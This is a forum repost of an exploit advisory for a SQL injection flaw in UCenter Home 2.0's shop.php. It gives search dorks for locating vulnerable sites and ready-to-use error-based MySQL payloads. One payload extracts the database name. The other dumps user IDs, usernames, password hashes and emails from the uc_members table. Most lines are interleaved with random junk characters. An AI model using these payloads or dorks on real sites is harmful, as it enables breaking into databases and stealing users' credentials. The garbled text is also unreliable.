8 B2 Q% n! O: E! H) Z1 z9 J% i. [__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 1 h `4 c6 z' x9 W+ w S" n
) ~$ g+ q! ]' c0 f4 c 5 |3 l1 \! x3 ?, W& Z; n
$ ^2 I8 L. x- j @% e: a8 H, ?*/ Author : KnocKout ; }5 X0 p M5 d9 [! r' n+ c
% Y- c2 L! B" d$ @ ]*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers / w7 K* T; H/ i
- I; j) s( t5 h* w+ i
*/ Contact: knockoutr@msn.com ) z# h/ ^, Y# W7 l$ l7 n
$ J4 y' V5 Z6 j# `+ b+ j
*/ Cyber-Warrior.org/CWKnocKout
8 P+ m* e( j! A& w @! J* b0 N3 X
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / D: U* C6 O2 P2 Y# D4 e
& ]* x+ r$ k) D8 e3 ^2 F% ]
Script : UCenter Home
' c; `! ^2 b" m: D$ K6 ~, q/ p8 C1 N( _
Version : 2.0 / h* G8 X m7 W( ?# Y* c6 G
/ a9 [. t( N" T! |$ J7 u% z2 bScript HomePage : http://u.discuz.net/
0 m& O6 L: n, g: X: a: V
! ]3 ~7 e5 R$ R6 I" ]__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) a# Q5 ~+ l4 l7 z2 K2 v5 X/ s: i9 ~; N1 w# f
Dork : Powered by UCenter inurl:shop.php?ac=view
! W# U" z1 K7 _3 v2 Z5 q
0 Y2 |) S3 T. C# N) _Dork 2 : inurl:shop.php?ac=view&shopid=
* m( y+ ~; o; X1 ]& Q' i- r2 X' V9 E/ Q: D3 d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ) P9 S1 ~8 Q- W& a
X; e( {3 i F
Vuln file : Shop.php
' r9 @* Z9 o& {. q2 f& }
% w* f: e6 u; u9 t- z, S6 `8 Hvalue's : (?)ac=view&shopid=
, r2 l" v* Z, ~+ q8 Z1 S8 l' M" p0 c" U
Vulnerable Style : SQL Injection (MySQL Error Based)
3 |8 ^/ m" R* j/ T' K+ s9 \! n1 N5 U- g
Need Metarials : Hex Conversion
8 I: p6 ?2 |5 H4 B4 [
1 g6 L# j& H) N! v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 h( n4 N) T4 ^
! O; r: S# d9 F- a2 D/ f6 V
Your Need victim Database name.
" N4 d' m' r3 u( d1 Q# F: H+ ~7 v
/ r$ O, O0 ]- l3 n8 r4 V( O& E/ Xfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 ?7 n. o% p1 E/ [
: a) ?, u5 W. {+ o, ~4 B..
, Q, i8 H! m: |/ h9 E
3 K5 C5 X2 Y7 H7 VDB : Okey. ) ?8 p# }3 c" G0 n
3 e9 N$ L5 Z' {your edit DB `[TARGET DB NAME]` | w7 h" G- X1 k
0 n7 B2 A0 H s' T# Y1 DExample : 'hiwir1_ucenter' ! I3 o& Y$ j, n0 d' Z
4 R2 ~. T6 b! |9 K
Edit : Okey. 6 v2 n P: f4 v, \7 w, h o
" S5 J: b* L8 C! k$ s; I- I: T) F
Your use Hex conversion. And edit Your SQL Injection Exploit.. : B m- r- `: A ~4 _
# u: B j; V% F& ~/ Z. a
: \$ p( F; a; M1 a1 J& c
! w4 Q/ ~# _# w: Y) O, dExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 & [6 i! [7 Y. J7 t
|
发表于 2013-2-27 21:31:31
收藏
支持
反对